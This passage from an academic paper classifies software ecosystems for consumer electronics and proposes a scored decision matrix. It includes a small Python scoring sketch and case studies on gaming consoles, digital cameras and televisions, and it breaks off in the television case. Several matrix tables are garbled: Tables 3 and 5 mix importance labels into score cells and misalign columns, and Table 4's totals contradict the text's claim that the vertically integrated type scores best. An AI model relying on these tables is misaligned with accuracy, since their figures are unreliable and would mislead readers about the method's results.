This paper is structured as follows. In Section 3.2 background is provided on consumer electronics. In Section 3.3 a classification of ecosystems is given. Section 3.4 describes the first steps towards a multi-criteria decision support method. Section 3.5 describes the case studies. This paper is concluded with a comparison with related art in Section 3.6, and our conclusions and a description of further research in Section 3.7.
3.2 Background on Consumer Electronics Products
3.2.1 Trends and challenges
Current consumer electronics products have characteristics of embedded devices as well as of general purpose computing devices [Hartmann 2012]. As embedded devices they are designed to perform dedicated functions, such as making telephone calls or playing games or movies, which have real-time performance requirements. There is high pressure on the cost price, and therefore the integrated circuits (ICs) should operate as efficiently as possible, using ICs with the smallest achievable footprint. Consumer electronics devices have constrained computing resources and should use as little energy as possible, because they often have few options for heat dissipation. For mobile devices, which operate on batteries, this is even more important. As a consequence, a consumer electronics product contains as few hardware and software components as possible.
These devices also have characteristics of general purpose computing devices because they are meant for a variety of tasks such as Internet browsing, reading and writing documents, accessing social media and playing games.
The combination of these two characteristics leads to numerous architectural and commercial challenges. As an example, consider Flash, an Internet browser plugin for watching videos. Apple has not allowed the use of Flash on their smart phones and tablets because it significantly shortens battery life [Jobs 2011], but has promoted the use of the H.264 video encoding standard, for which their devices are optimized.
3.2.2 System architecture
In Figure 13 a high-level system architecture of consumer electronics products that support 3rd party applications is presented, showing some of the actors for different product types.
The architecture consists of a hardware platform, an OS kernel and middleware that offers a framework for application developers [Halasz 2011, Trew 2011]. The hardware layer consists of a System on Chip (SoC) with peripheral ICs. A SoC contains several dedicated building blocks on a single IC, such as audio decoding, memory and a configured CPU. A dedicated SoC, which is common for embedded systems, is better able to meet the performance requirements at lower power consumption than a general purpose CPU with separate ICs, as in the PC industry. The design of the software and the SoC are tightly coupled, e.g. for controlling the power consumption of separate hardware building blocks.
Figure 13 System architecture of consumer electronics products that support 3rd party applications
3.3 A Classification of Ecosystem Types
This section describes the move towards ecosystems and provides a classification of the ecosystems that are used today.
3.3.1 Growing software size: move towards ecosystems
In an earlier paper we analyzed the transition in the consumer electronics industry from 1990 until 2010 [Hartmann 2012]. Initially these products were developed by vertically integrated companies that developed the hardware, firmware and applications, as well as created the end products. Examples of companies that created traditional consumer electronics products such as televisions, DVD players and radios are Philips, Sony and Matsushita. Examples of companies that created the first generation of mobile phones are Nokia, Siemens, Ericsson and Motorola.
Over time, an increasing proportion of the functionality was implemented through software and this introduced the need for dedicated application processors and operating systems. The development investments, both for hardware and software, became significantly higher and therefore the companies needed to focus their activities. Separate
hardware platform suppliers were created as spin-offs of the vertically integrated companies, such as Qualcomm [Qualcomm 2014], NXP and Freescale. When hardware platforms and other components became commodities it was possible for newcomers to enter the market without large investments. Examples of these newcomers are TCL, HTC and Apple in the market of mobile and smart phones and Dell, Apple and Microsoft in the market of digital televisions and set-top boxes.
Several software vendors entered the market and created a common software platform in an attempt to replicate the Wintel model [Grove 1996, West 2011]. As with Microsoft Windows, a firm controlling the spanning layer can earn most of the revenues, since it controls the interface towards the hardware as well as towards the applications [Messerschmitt 2004, Baldwin 1997]. The number of competing mobile platforms that entered the market was significant, e.g. WebOS, Android, LiMo, Symbian, Windows Mobile, MeeGo etc. Similarly, in the domain of digital televisions and set-top boxes, multiple platforms entered the market, such as Windows, Horizon TV and OpenTV. Until 2009 most of these attempts didn't gain industry-wide adoption and the industry was highly fragmented.
In the mobile domain, starting in 2010, many of the vertically integrated firms lost market share and Android, an open source software platform, gained market share rapidly. Furthermore, the dominant player in the PC market, Microsoft, increased its efforts to gain market share. For other consumer electronics products, such as digital televisions and digital cameras, a similar transition occurs in which vertically integrated companies start adopting open source software platforms [Engadget 2014]. As a result there is a fierce battle between different ecosystems in the market of many consumer electronics products.
3.3.2 Classification of ecosystems with their complementors
This paper discusses ecosystems for consumer electronics that are aimed at supporting 3rd party applications. For a comparison of these ecosystems we use a classification based on two properties: (1) is the software proprietary or open source, and (2) are the hardware and device included? Figure 14 shows this classification with examples from the domain of smart phones.
<table>
  <thead>
    <tr>
      <th></th>
      <th>Proprietary closed source</th>
      <th>Open source</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Software platform only</td>
      <td>(2) Windows, WebOS (2010-2012)</td>
      <td>(3) Android, Tizen, Firefox OS</td>
    </tr>
    <tr>
      <td>Hardware and device included</td>
      <td>(1) Apple, RIM, Nokia (&lt; 2013)</td>
      <td>(4) Not present in the market</td>
    </tr>
  </tbody>
</table>
Figure 14 Classification of ecosystem types with examples from smart phones
This classification results in four possible ecosystems:
1: Vertically integrated proprietary hardware/software platform. This platform consists of the hardware, proprietary closed source software and includes the device. The complementors are the application (App) developers.
- Examples of platforms and their leaders for smart phones: Apple with the iPhone, RIM with BlackBerry and Nokia with Asha.
- Examples for digital televisions and set-top boxes: LG with WebOS, Apple with AppleTV, Samsung with Smart TV.
- Examples for personal computers: Apple with OS X.
2: Proprietary, closed source software platform. This platform consists of a proprietary closed source software platform. The complementors are the suppliers of hardware platforms, system integrators, device manufacturers and application developers.
- Examples of such platforms for smart phones: Windows Phone and WebOS (2010-2012).
- Examples for digital televisions and set-top boxes: Horizon TV, Microsoft TV.
- Examples for personal computers: Microsoft Windows.
3: Open source software platform. This platform consists of an open source software platform. The open source software platform is based on the concept that multiple parties can contribute to share development effort and since the source is open, the device manufacturers can change, add or remove functionality. The complementors are the suppliers of hardware platforms, system integrators, device manufacturers and application developers.
- Examples for smart phones are Android, Tizen and Firefox OS.
- Examples for digital televisions and set-top boxes: Android, Meego, Ubuntu TV.
- Examples for personal computers: Chrome OS, Linux, FreeBSD.
4: Open source software and hardware platform. This platform would consist of an open source software platform including the hardware and device. The users of such a platform, or rather product, would be able to change the code of the software platform and add their own functionality. We have excluded this type from this paper as this type is, to our knowledge, not available in the market. Note that in the past some handset makers of smart phones used an open source platform for which they acted as the platform leader, e.g. Nokia, which used Symbian when it was open source, and Motorola (owned by Google), which used Android. In this situation the handset makers are in-house complementors of the open source software platform and therefore the combination is not a separate type of ecosystem.
3.4 Towards a Multi-Criteria Decision Support Method
This section describes the first step towards a multi-criteria decision support method for selecting the most suitable ecosystem type for a certain product category. This section starts with an overview of the method, followed by the background. Then each step is explained in detail.
3.4.1 Overview of the method
This method is based on comparing the strengths and challenges of each ecosystem type with the market requirements of a product category. As shown in Figure 15, the method consists of three steps:
Step 1: For a product category the most important requirements are determined.
Step 2: The strengths and challenges of the three ecosystem types are identified for these requirements.
Step 3: A decision support matrix is created that shows a total score per ecosystem type, based on the importance of the requirements and the strengths and challenges of the ecosystem types.
Figure 15 Multi-Criteria Decision Support Method
This method uses similar steps and techniques as those used for the selection of software suppliers and software components [Nazir 2014]. In these methods, a multi-criteria analysis [Gella 2006] is similarly used to compare multiple criteria, or requirements, with the ability of the supplier, or software component, to fulfill them [Alpar 2010]. A decision matrix is used to rank the options so that the decision can be made more objectively [Pugh 1996], and ordinal scales [Cooper 2011] are used since quantitative information is mostly not available [Goulão 2007]. The decision support matrix is used in the same way as in these methods to support the selection of alternatives based on a multi-criteria analysis, and the importance and evaluation of the criteria are based on expert opinion.
Since ordinal scales are used for the requirements and for the total score, the values do not represent absolute numbers but are solely used as a scale to express the differences between the types of ecosystems.
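As an illustration only, the computation behind such a decision support matrix can be sketched in a few lines of Python. The key/high importance levels and the +/0/- scores come from the method as described; the numeric weights (key = 2, high = 1), the score values (+1, 0, -1) and the example product category are our own assumptions, chosen to show the mechanics rather than values prescribed by the method.

```python
# Sketch of the Step 3 decision support matrix (illustrative only).
# The numeric mapping of the ordinal scales is an assumption.
IMPORTANCE_WEIGHT = {"key": 2, "high": 1}
SCORE_VALUE = {"+": 1, "0": 0, "-": -1}

def total_scores(importance, scores):
    """importance: requirement -> 'key' or 'high'
    scores: ecosystem type -> (requirement -> '+', '0' or '-')
    Returns an ordinal total per ecosystem type."""
    totals = {}
    for eco, per_req in scores.items():
        totals[eco] = sum(
            IMPORTANCE_WEIGHT[imp] * SCORE_VALUE[per_req[req]]
            for req, imp in importance.items()
        )
    return totals

# Hypothetical product category with two key and one high requirement;
# the +/0/- entries follow the evaluations of Section 3.4.4.
importance = {"Development cost": "key",
              "Variability": "key",
              "Speed of innovation": "high"}
scores = {
    "Vertically integrated": {"Development cost": "-",
                              "Variability": "-",
                              "Speed of innovation": "+"},
    "Closed source platform": {"Development cost": "0",
                               "Variability": "0",
                               "Speed of innovation": "-"},
    "Open source platform": {"Development cost": "+",
                             "Variability": "+",
                             "Speed of innovation": "0"},
}
print(total_scores(importance, scores))
```

With these assumed weights, the open source type scores highest for this hypothetical product category; a different (but still ordinal-consistent) numeric mapping would change the totals, which is why the totals should be read only as a relative ranking.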
Section 3.5 presents case studies for different product categories. Step 2 of the decision support method is independent of the product category, and therefore the strengths and challenges of the three identified ecosystems are described in Section 3.4.4 and then used in the case studies in Section 3.5.
3.4.2 Background of the method
3.4.2.1 Platform scope and technology design
Gawer and Cusumano designed a framework for a company to become a platform leader. A platform leader drives the innovation in the industry, ensures the integrity of the overall system and creates opportunities for firms that create complementary products [Gawer 2002]. This framework includes (1) how a company defines the scope of the platform, i.e. what part of the product is developed in-house and what it leaves for complementary firms, (2) the technology design, e.g. to what degree the platform should be open to the complementors and how the interfaces are defined, (3) how external relations are managed, and (4) how the internal organization is structured [Gawer 2008].
The scope and technology design highly determine the success of a platform. It should support the capabilities of the platform leader, allow for complementors to contribute and be able to respond to changing requirements. While all three ecosystem types provide a platform for 3rd party developers, they differ in the contributions the complementors can make to the final product and in the degree to which the complementors can alter the platform.
For the vertically integrated platform type the scope is very wide and the complementors have no options to contribute to or alter the platform. The closed source platform type provides the system integrators and device manufacturers the possibility to add distinguishing functionality, but leaves little to no options to alter the platform, e.g. to make changes to the API (Application Programming Interface) and the interfaces towards the hardware layer. The open source software platform provides the complementors the option to contribute to the platform and make changes to it, thus allowing a large degree of freedom. The latter also leads to risks, because the platform owner may lose control over the platform [Iansito 2004].
Since the scope and technology design constitute the largest differences between the three identified types of ecosystems, this is the basis of the decision support method.
3.4.2.2 Evaluation criteria
In order to evaluate the most suitable scope and technology design for a platform, the criteria that determine this need to be defined. Here we draw an analogy between the selection of an ecosystem type and the selection of software components [Nazir 2014] and of a software vendor [Alpar 2010].
The selection of a software component is based on whether it fulfills the functional and architectural requirements, as well as whether it is able to address non-functional requirements. This set includes: costs of the component, quality, whether it fits the architecture, is modifiable, maintainable, portable and so on [Kontio 2010]. A supplier selection is typically based on the abilities of a supplier to fulfill the functional and non-functional requirements [Alpar 2010] and includes the maturity of an organization, its customer base, and the way it cooperates with its customers. Since we use the requirements from the market, we will further use the term requirements to describe the criteria.
The requirements that will be used in our decision support method are a combination of those used for component and supplier selection. As with vendor selection, the choice of an ecosystem is based on its ability to fulfill the functional and non-functional requirements. As with the selection of components, an ecosystem type has to be able to provide a platform that fulfills the architectural requirements.
For evaluating the non-functional requirements we use the competitive forces of Bolwijn and Kumpe [Bolwijn 1990], which determine the success of a consumer electronics firm: Cost, Quality, Flexibility and Innovation. In a later analysis, Sheate [Sheat 2010] identified Variability as a requirement, which is strongly related to flexibility. In this context cost is interpreted as the software development cost, since reproduction costs for software are negligible.
The key architectural requirements for embedded systems and consumer electronics products are: Efficient use of system resources and hard real time requirements [Henzinger 2006, Trew 2011].
Furthermore, we use requirements that are specific to ecosystems, namely: Stability of the interface, since complementors have to rely on a stable and, ideally, backwards compatible interface [Messerschmitt 2004, Jansen 2013], and Effort for system integration, since for the set-makers the integration of hardware and software is a substantial and increasing proportion of the development effort [Underseth 2007].
This gives the following set of requirements:
- **Development Costs, Quality, Variability, Speed of Innovation, System resources and hard real time requirements, Interface stability and Integration effort.**
In the following sections, these requirements are elaborated. Other criteria that determine the success of an ecosystem are not covered, since this paper takes a software engineering perspective.
3.4.3 Step 1: Identification of the importance of each requirement for a product category
The requirements are evaluated based on the characteristics of the product and the market demands. For each requirement, it is determined whether it is “key”, meaning that it is an absolute necessity to support this, or of “high” importance.
- **Development cost:** This is based on the estimated size of the software and the effort that is required to maintain the platform and develop new functionality. This requirement is evaluated as of high, or key, importance when the amount of software is large and continuous enhancements are needed.
- **Quality:** This is based on the costs when a product or one of its functions fails, which includes the usability of the product and the commercial impact of product failures.
- **Variability:** This is based on the number of variants that are needed to satisfy the different market segments and customers. This typically includes different features, price setting, screen sizes, the support of different regional standards, etc.
- **Speed of Innovation:** This is based on the speed at which new products with new features are introduced and whether the new functionality is a reason for consumers to buy a (new) product. E.g. when a new product replaces an older version within one or two years, and customers replace their old product, the speed of innovation is evaluated as of high importance.
- **System resources and hard real time requirements:** This is based on the pressure on the cost price of the ICs, the need to ensure good system performance, and the requirements for ensuring a long battery lifetime for mobile devices. This is therefore a very important requirement for small products, such as wearables, and for products for which there is high pressure on the cost price. When real time aspects are important, e.g. to play music and games without audible and visual interruptions, this requirement is also evaluated as of high importance.
- **Interface stability:** This is based on whether the API has to be rigorously followed for an application to work correctly and whether a large number of 3rd party applications is needed to gain sufficient traction in the market.
- **Integration effort:** This is based on the development and test effort that is required to create an end-product from its software and hardware components. This is a result of the number of hardware and software components that are used and whether the interfaces between them are stable, i.e. whether a modular architecture has been created. For innovative products that contain components with new functionality and changing interfaces, the integration and test effort is high.
Note 1: These requirements are not completely independent. For instance, a high degree of innovation will cause higher development costs and integration effort.
Note 2: We do not further distinguish between requirements that are of "Medium" or "Low" importance, since for such a fine-grained distinction our method is not sufficiently accurate and complete at this moment in time.
3.4.4 Step 2: Evaluation of the requirements for each ecosystem type
In this section we analyze each of the three ecosystem types, and each requirement is "scored" on whether it is challenging or easier to address, i.e. a strength of an ecosystem type. Here + means: easier to address, 0 means: neutral, and - means: challenging. This analysis is based on the experience of the authors, the information in literature and the case studies presented in our earlier work [Hartmann 2014].
**A: Development Cost.** The larger the scope of the platform, the more development and maintenance effort is required from the platform owner. When multiple parties are involved these costs can be shared between the participants [Genuchten 2007]. Because hardware and software development is costly, this is the main reason why ecosystems became widely adopted. Firms that aim for low costs specialize in a few products so that tasks become routine [Bolwijn 1990]. Consequently, products that are developed in concert by specialized firms, especially when interfaces are pre-defined, can be made at lower costs.
For the vertically integrated type this requirement is challenging since they develop the entire platform including both hardware and software and can only amortize their investments over their own devices (hence score = -). The open source platform can more easily address this, especially when the complementors contribute to the platform and often individual developers develop code in their free time [Gawer 2008] (hence score = +). For the proprietary software platform we evaluate this as neutral (score = 0): Although this
platform owner has to develop the platform on its own, the costs can be amortized over multiple products from different device manufacturers.
**B: Control over Quality.** The overall product quality depends on the combination of software from the different contributors and failures often occur because of component interaction, unclearly documented API or unknown use of the system [Trew 2006, Oberhauser 2007]. A firm that controls a wide scope of the architecture can guarantee the product quality more easily [Axelsson 2014]. In the situation where multiple firms are involved, and especially when the interfaces are not clearly defined, the quality can easily break down and externally developed code could access data in the system, causing malfunctioning or security problems. Furthermore, applications developed by complementors may not follow the UI standards, as set by the platform owner, thereby causing a reduced user experience [Bosch 2010, Jansen 2013].
The quality can be controlled more easily by the vertically integrated platform type, as these firms have full control over the end-product. Furthermore, they are able to test the externally developed applications on their devices (hence score = +). For the proprietary platforms we evaluate this as neutral (score = 0): although they have no control over the hardware, they can control the API and, because of its closed nature, can more easily avoid that code with defects is added to the platform. For the open source platform we also regard this as neutral (score = 0). Because of its open nature, faulty code can be added or code can be changed incorrectly by the complementors, and applications may compromise the security. An advantage, however, is that the software is developed and tested by a large variety of firms and open source developers.
**C: Variability:** Specialized firms can often add variability to a platform more easily [Moore 2006], e.g. because they have the required knowledge, can reuse existing hardware and software components and can have more intimate contact with the end-users [Bosch 2009].
Flexibility and variability are easier to achieve through the open source platform type, since complementors can add or remove functionality without the need to involve the platform owner (hence score = +). For the proprietary platform type we evaluate this as neutral (score = 0): the device manufacturers can create differentiating products with different hardware configurations; however, this is limited to what is supported by the software platform. As a comparison, look at the PC industry, where the different OEM suppliers of a Windows based PC can only compete on price, service and hardware quality, since the functionality is largely determined by the proprietary software platform. For the vertically integrated platform owner it is far more difficult to cover a wide range of products. In order for a firm to be flexible and respond quickly, it needs to focus on a number of core activities [Bolwijn 1990], and the development of all the required hardware and software components would simply be too costly. We therefore evaluate this as challenging for this type (score = -).
**D: Freedom to innovate:** The optimal definition of the boundaries depends on where the major innovation steps in the architecture take place. When innovation takes place across the boundaries of the platform, the integrity of the platform is compromised and the complementors need to be involved, thus slowing down the speed of innovation [Messerschmitt 2004]. Therefore, a wide scope more easily allows for larger innovation steps.
The introduction of multi touch screens in smart phones is such an example. Due to this innovation specialized hardware was needed; the interface towards the user has changed and a new API towards the application developers was required. Such a large innovation step couldn’t be done through small changes to an existing platform.
Large innovation steps are easier to establish by the vertically integrated platform type (score = +) because these firms control the entire architecture and complementors do not need to be involved. In the proprietary platform type the innovation is restricted, because hardware is not part of the scope and the platform supplier has to involve hardware suppliers and device manufacturers for major steps (hence score = -). For the open source platform the hardware is not part of the scope either; however, the complementors may change the code and thus have the possibility to innovate independently of the platform owner, as long as the architecture does not have to be changed. Therefore we evaluate this as neutral (score = 0).
**E: Efficient use of system resources and hard real time requirements:** Due to the need for optimal resource utilization and low power consumption, direct control of the hardware is required. An embedded device usually contains a System on Chip (SoC) and each component is controlled separately. For instance, for video decoding in a digital television a separate building block of the SoC is used, which can operate with low power consumption and is only active when needed. Furthermore, by controlling each part of the IC separately it can be avoided that processes interrupt each other. Therefore the hardware and software are designed in parallel, which requires close co-operation [Halasz 2011].
As a comparison, look at the Wintel framework; the dominant ecosystem in the PC industry [Grove 1996]. This is a modular architecture with stable interfaces between the hardware and the software layer. Both Microsoft and Intel can independently innovate on their part of the architecture. Such a modular interface is possible because most demands of the end user can easily be met by existing hardware. For mobile phones such a modular interface is not yet possible since there are still large innovation steps that involve changes to hardware and software together and a modular architecture would lead to less efficient resource utilization [Christensen 2002].
Since the vertically integrated platform type has control of both the hardware and the software, this can be controlled more easily (score = +). In the open source type the complementors can also change the code to accommodate the hardware and vice versa, and therefore this can also be controlled (hence score = +). For a proprietary platform type this is challenging since changes to hardware may require changes to the proprietary platform and vice versa (hence score = -).
F: Stability of the Interface: It is important for a platform to maintain a (sufficiently) stable API, thus avoiding interoperability problems where applications do not work on the variety of devices based on different versions of a platform [Iansito 2004]. This
Consumer Electronics Software Ecosystems
fragmentation is seen as the major challenge by the application developers [Gadhavi 2010, Gilson 2012].
Vertically integrated platforms can more easily avoid fragmentation since they have full control over the API (hence score = +). This also holds for the closed source proprietary platform, similarly to the case in the PC industry, where this has proven to be a major advantage and success factor of this type of platform [Moore 2006] (hence score = +). For an open source platform this is challenging since fragmentation can easily occur because device manufacturers can change the API or the hardware (hence score = -).
**G: Effort for system integration:** The integration of hardware and software components takes an increasing amount of time, especially when components from different parties are used, e.g. with different technologies, non-matching interfaces or heterogeneous architectures [Henzinger 2006]. When a modular architecture with stable interfaces exists, the integration time would be substantially less [Christensen 2004]. Furthermore, when multiple parties are involved, the time for interaction, definition of requirements etc. forms a substantial part of the development effort.
For the vertically integrated platform type the integration is easier to manage since no complementors are involved and the integration is done with in-house development for which the interfaces can be defined (hence score = +). For the proprietary platform type this is challenging since this may require that code has to be altered or glue components have to be developed [Hartmann 2013] (hence score = -). In the open source platform type the device manufacturers or the system integrators can perform the hardware/software integration without (intensive) support of the platform supplier. Therefore we evaluate this as neutral (score = 0).
Table 2 gives an overview of the strengths and challenges per ecosystem type.
**Table 2 Overview of types of ecosystems and their strengths and challenges**
<table>
<thead>
<tr>
<th>Type / Requirement</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>-</td>
<td>+</td>
<td>-</td>
<td>+</td>
<td>+</td>
<td>+</td>
<td>+</td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>0</td>
<td>0</td>
<td>-</td>
<td>-</td>
<td>+</td>
<td>-</td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+</td>
<td>0</td>
<td>+</td>
<td>0</td>
<td>+</td>
<td>-</td>
<td>0</td>
</tr>
</tbody>
</table>
In this overview: + means: easier to address, i.e. a strength, 0 means: neutral, - means: challenging
**3.4.5 Step 3: Creation of the decision support matrix**
The determination of which type of ecosystem is most suitable is based on comparing the importance of each requirement with the strengths and challenges of the ecosystem types from Table 2. The decision support matrix of a product category shows the evaluation for each ecosystem type. An example is shown in Table 3. This matrix shows which of the requirements are of “high” importance and which are “key”.
Table 3 Example of a decision support matrix
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>High</td>
<td>High</td>
<td>Key</td>
<td>High</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td>-1</td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>0</td>
<td>-2</td>
<td>-1</td>
<td>-3</td>
<td>n.a.</td>
<td></td>
<td>-2</td>
<td>-1</td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+1</td>
<td>+1</td>
<td>+2</td>
<td>0</td>
<td>+4</td>
<td>1</td>
<td></td>
<td>+3</td>
<td>+4</td>
</tr>
</tbody>
</table>
The total score is the sum of the individual scores for the important requirements, each ranging from -1 to +1. The scores of the key requirements are doubled, to express their relatively higher importance, and therefore range from -2 to +2.
The final column shows which of the ecosystem types are used most in the current market. In this example the open source platform type is used most, followed by the vertically integrated type, while the proprietary type is not available (n.a.).
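The aggregation rule above can be sketched as a small helper function. This is only an illustrative sketch: the function name, argument names and dictionary encoding are our own, not part of the chapter's notation.

```python
def total_score(type_scores, importance):
    """Sum the per-requirement scores (+1 strength, 0 neutral, -1 challenge,
    as in Table 2) over the requirements marked important for a product
    category; 'key' requirements count double, as described in the text."""
    total = 0
    for requirement, level in importance.items():
        weight = 2 if level == "key" else 1
        total += weight * type_scores[requirement]
    return total

# Hypothetical example: a category where requirements A and B are of high
# importance and C is key, evaluated for an ecosystem type that scores
# -1 on A, +1 on B and +1 on C.
score = total_score({"A": -1, "B": +1, "C": +1},
                    {"A": "high", "B": "high", "C": "key"})
# -1 + 1 + 2*1 = +2
```

Requirements that are neither high nor key simply do not appear in the importance mapping and therefore do not contribute to the total.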
3.5 Case Studies
The case studies in this section cover a wide range of consumer electronics products that support 3rd party applications: (1) Gaming Consoles, (2) Digital Cameras, (3) Digital Televisions and Set-top Boxes, (4) Smart Watches, (5) Smart Phones, (6) Tablets and (7) Personal Computers. This selection includes products that have existed for a decade or longer as well as recently introduced products. Furthermore, both large boxes and wearable devices are included. Each case study contains a brief description of the product, the firms that are active, a historical overview of the transitions, a description of the ecosystems that are used, the ecosystems that are considered most suitable according to the multi-criteria decision support method, and those that are used most.
These case studies are based on publicly available information. The determination of the importance of each requirement is done by the authors based on the products that are currently available in the market and supported by references when available.
3.5.1 Gaming Consoles
Product description and historical overview
Gaming consoles have existed since the fifties and originally only contained games that were integrated in the consoles. Later it became possible to purchase games separately, initially as cartridges, later as CD-ROMS and today downloadable from the Internet. The development of games was initially done by in-house developers, the so-called 1st party developers. Later games were also developed by 2nd party developers, i.e. game developers that worked on a contract base for the console manufacturers and later 3rd parties who independently developed games for a specific console. Hence the use of ecosystems was
introduced early for these products. However, the sales of games are controlled by the publishers, i.e. the manufacturers of the consoles.
Gaming consoles are replaced with new versions every three to four years, with each new version offering radically new functionality compared to the previous one [worldfinance 2014]. Consumers are willing to buy these new products, e.g. to support faster games, better graphics, 3D, motion detection and so on. Furthermore, consumers spend a great deal of money on new games, which provides additional revenues for the console manufacturers. Since the nineties, only three or four console manufacturers have had a dominant position [Vgchartz 2014], which resulted in a customer base that was large enough to amortize the investments.
Manufacturers do not create many variants of their products; only regional differences are supported. In this way the developed games can be played on all the devices, where backwards compatibility of older versions of consoles is not supported. The major manufacturers use a proprietary hardware/software platform and have done so since the beginning of this industry.
In 2013 gaming consoles were introduced based on the open source software platform Android, such as Shield, Gamestick and Ouya. However, none of these initiatives gained a large market share because they did not create the gaming experience that the traditional manufacturers offered [Trew 2014, Kain 2014, Hollister 2014]. A proprietary closed source software platform is not used in this market.
Analysis of ecosystem type
This product category is characterized by almost all requirements being evaluated as of high importance, with speed of innovation and interface stability as key requirements. The development costs are high since consoles consist of a large amount of software that needs to support a variety of input devices and different screens. The demands on system resources and hard real time requirements are also high because performance and graphics quality determine the attractiveness of the system. The speed of innovation is key because gamers switch between systems frequently and want to play the latest games using the latest technology. A stable interface is an absolute necessity because it has to be guaranteed that purchased games run on a given console.
Table 4 Decision support matrix for gaming consoles
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>-1</td>
<td>+2</td>
<td>+1</td>
<td>+2</td>
<td>+1</td>
<td>+5</td>
<td>-1</td>
<td>1</td>
<td></td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>-2</td>
<td>-1</td>
<td>+2</td>
<td>-1</td>
<td>-5</td>
<td>0</td>
<td>-</td>
<td></td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+1</td>
<td>0</td>
<td>+1</td>
<td>-2</td>
<td>0</td>
<td>0</td>
<td>0</td>
<td>2</td>
<td></td>
</tr>
</tbody>
</table>
Table 4 shows that the vertically integrated platform type scores substantially better than the other types. This is because the speed of innovation and hard real time requirements are supported best in this ecosystem type, while variability is not an important requirement. Due to the speed of innovation it is not expected that a high degree of modularity can be obtained. The vertically integrated ecosystem type is by far the most used in this market and is likely to remain the dominant type.
The development costs are a main challenge. As a consequence only a few, 2 to 3, manufacturers have been successful in the market and newcomers are rarely successful. This is in sharp contrast with most consumer electronics products, e.g. televisions, audio players, smart phones etcetera, in which many firms are active and have a profitable business, and for which the development investments are substantially lower.
3.5.2 Digital Photo Cameras
Product description and historical overview
Digital cameras were introduced in the mid-nineties and rapidly replaced photographic films. Digital cameras contain dedicated hardware components and an operating system with hard real time requirements to ensure that the system responds in a timely manner and stores images correctly. The size of this software has been relatively small and focused on a few dedicated tasks. In later years software features were added, such as facial recognition; however, a general purpose operating system was not needed.
Around 2010 cameras became connected via Wi-Fi, at first mainly to upload pictures. Due to the growing popularity of smart phones, and the reduced costs for hardware components, manufacturers started using Android as a platform to add functionality that exists in smartphones. At the same time smart phones were equipped with higher quality lenses and sensors, and cross-over products, such as the Samsung Galaxy K zoom, were created. This cross-over is not surprising since Android was initially intended as a platform for digital cameras [Berenaum 2013]. Lytro has created a camera that is focused on 3D and allows for focusing after the picture has been taken. Lytro offers a software platform, along with their device, that is able to share pictures with social media [Lytro 2014]. Until now Lytro has not made their platform available for 3rd parties.
In the early years of digital cameras, i.e. until 2005, the speed of innovation was high, resulting in consumers being willing to purchase new cameras with better image quality and features created through software. In later years, e.g. since 2010, the speed of innovation has been much lower and the innovation is limited. As a result the sales of new cameras dropped [Mintel 2014].
Analysis of ecosystem type
The variability requirements are high because digital cameras are offered in a large number of variants, e.g. ranging from compact cameras to single-lens reflex cameras and a variety of types in between. Furthermore, different sensors, (touch screen) displays, flash lights etcetera are used. The use of system resources and hard real time requirements is challenging because ICs with as small a footprint as possible should be used, given the high pressure on cost price, and because the response time when taking a picture is crucial. In contrast with gaming consoles, innovation is not a requirement of high importance
because digital photo cameras usually follow the functionality in smart phones. Also interface stability is less important because supporting 3rd party applications is not a key selling feature.
Table 5 Decision support matrix for digital photo cameras
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>-1</td>
<td>+1</td>
<td>High</td>
<td>High</td>
<td></td>
<td></td>
<td></td>
<td>0</td>
<td>n.a.</td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>-1</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td>-1</td>
<td>n.a.</td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+1</td>
<td>+1</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td>+2</td>
<td>1</td>
</tr>
</tbody>
</table>
Table 5 shows that the open source software platform has the highest total score, because the variability is high while the speed of innovation is less important for this type of product. A high degree of modularity is not likely to be obtained because of the need to support a large range of products while using ICs with a low cost price is essential. Therefore a proprietary software platform is not a suitable ecosystem type. In the current market only an open source platform is used.
3.5.3 Digital televisions and set-top boxes
Product description and historical overview
Televisions, and later digital televisions and set-top boxes, were developed by specialized firms that developed and manufactured the entire product. Over time more and more software and hardware components from specialized suppliers were used [Hartmann 2012]. Over the last decade, i.e. since 2007, the possibility to add 3rd party applications has been introduced so that consumers can use applications that they are familiar with from their personal computers and smartphones. Examples are YouTube, weather forecasts and sharing of pictures. For these types of TVs, the term “Smart TV” is used.
Many firms have created an ecosystem based on a vertically integrated platform, such as Samsung with Smart TV [Samsungforum 2014], LG with WebOS [Onlinerreport 2014] and Apple with AppleTV [Apple 2014], a set-top box.
